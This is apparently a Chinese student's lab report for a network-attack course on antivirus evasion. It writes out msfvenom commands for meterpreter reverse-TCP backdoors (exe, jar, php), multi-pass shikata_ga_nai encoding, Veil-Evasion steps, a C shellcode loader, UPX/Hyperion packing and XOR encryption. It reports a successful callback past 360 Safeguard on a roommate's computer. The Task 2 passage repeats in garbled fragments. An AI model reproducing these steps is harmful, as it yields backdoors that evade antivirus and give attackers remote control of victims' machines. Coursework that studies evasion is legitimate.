2018-2019-2 网络对抗技术 20165239Exp3 免杀原理与实践

2018-2019-2 网络对抗技术 20165239 Exp3 免杀原理与实践

win10 ip地址 192.168.18.1

fenix ip地址为 192.168.18.128

（1）杀软是如何检测出恶意代码的？
•根据计算机病毒课程知道了每个病毒都有其对应的特征码，杀软是根据这些特征码来判定他是不是病毒。
•根据该软件的行为进行检测如有异常行为，会被判定为风险文件或病毒。
•基于行为的恶意软件检测：在启发式基础上对软件行为进行监控

（2）免杀是做什么？
通过一定的技术手段，将恶意软件处理，使之不会被杀毒软件发现。

（3）免杀的基本方法有哪些？
•改变特征码：对于.exe文件可以加壳，对于shellcode可以进行加密然后利用shellcode生成可执行文件，或者用其他语言进行重写再编译
•改变行为：根据改变通讯模式、操作模式来实现免杀。

1. 实践内容

任务一： 正确使用msf编码器（0.5分），msfvenom生成如jar之类的其他文件（0.5分），veil-evasion（0.5分），加壳工具（0.5分），使用shellcode编程（1分）

1.使用VirusTotal或Virscan这两个网站对实验二生成的后门程序进行扫描。
•VirusTotal扫描后结果如下：

2.用msf编码器对后门程序进行一次到多次的编码，并进行检测
•一次编码使用命令：

•VirusTotal扫描后结果如下：

•十次编码使用命令：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.241 LPORT=5336 -f exe > met-encoded10.exe

•VirusTotal扫描后结果如下：

3.msfvenom生成jar文件、php文件

•生成java后门程序使用命令：
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.18.128 LPORT=5239 x> 5239_backdoor_java.jar

•VirusTotal扫描后结果如下：

•生成php后门程序使用命令：msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.18.128LPORT=5239 x> 5239_backdoor.php

•VirusTotal扫描后结果如下：

4.使用veil-evasion生成后门程序及检测
•安装veil
代码
：sudo apt-get install veil

•安好后use evasion命令进入Evil-Evasion

•设置反弹连接IP，set LHOST 192.168.18.128，IP是KaliIP；设置端口set LPORT 5239命令use c/meterpreter/rev_tcp.py进入配置界面

•设置反弹连接IP，set LHOST 192.168.18.128，IP是KaliIP；设置端口set LPORT 5239

•指令generate生成文件，输入playload的名字：veil_c_5239

•VirusTotal扫描后结果如下

5.手工注入Shellcode并执行
•使用命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.128 LPORT=5239-f c用c语言生成一段shellcode;

•vim 20165239.c，然后将unsigned char buf[]赋值到其中
unsigned char buf[] =
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.128 LPORT=5239 -f c生成的代码 加
int main()
{
int (func)() = (int()())buf;
func();
}

•使用命令：i686-w64-mingw32-g++ 20165239.c -o 20165239.exe编译这个.c文件为可执行文件;
•VirusTotal扫描后结果如下

6.加壳尝试
•加压缩壳upx 20165239.exe -o 20165239_uped.exe

•VirusTotal扫描后结果如下：

•加密壳Hyperion：进入目录/usr/share/windows-binaries/hyperion/中将20165239_uped.exe拷贝进来并用wine hyperion.exe -v 20165239_upxed.exe 20165239_upxed_Hyperion.exe进行加壳

•VirusTotal扫描后结果如下：

任务二：通过组合应用各种技术实现恶意代码免杀(0.5分)
•用codeblocks的C语言将前面的.c文件里的shellcode加密（加密方式为加五在异或0x66）得到下图的shellcode，然后在进行加压缩壳。

•实现免杀效果，并回连成功 杀毒软件为360安全卫士
的C语言将前面的.c文件里的shellcode加密（加密方式为加五在异或0x66）得到下图的shellcode，然后在进行加压缩壳



任务二：通过组合应用各种技术实现恶意代码免杀(0.5分)
•用codeblocks的C语言将前面的.c文件里的shellcode加密（加密方式为加五在异或0x66）得到下图的shellcode，然后在进行加压缩壳

任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（加分0.5）
•对舍友电脑进行免杀效果测试并回连成功（舍友的杀软为最新的360安全卫士11）

实验感想：
本次实验大多数是我一个人完成的，有些不会则问舍友同学，在安装kali过程中很多都是问舍友，还有查阅网上的资料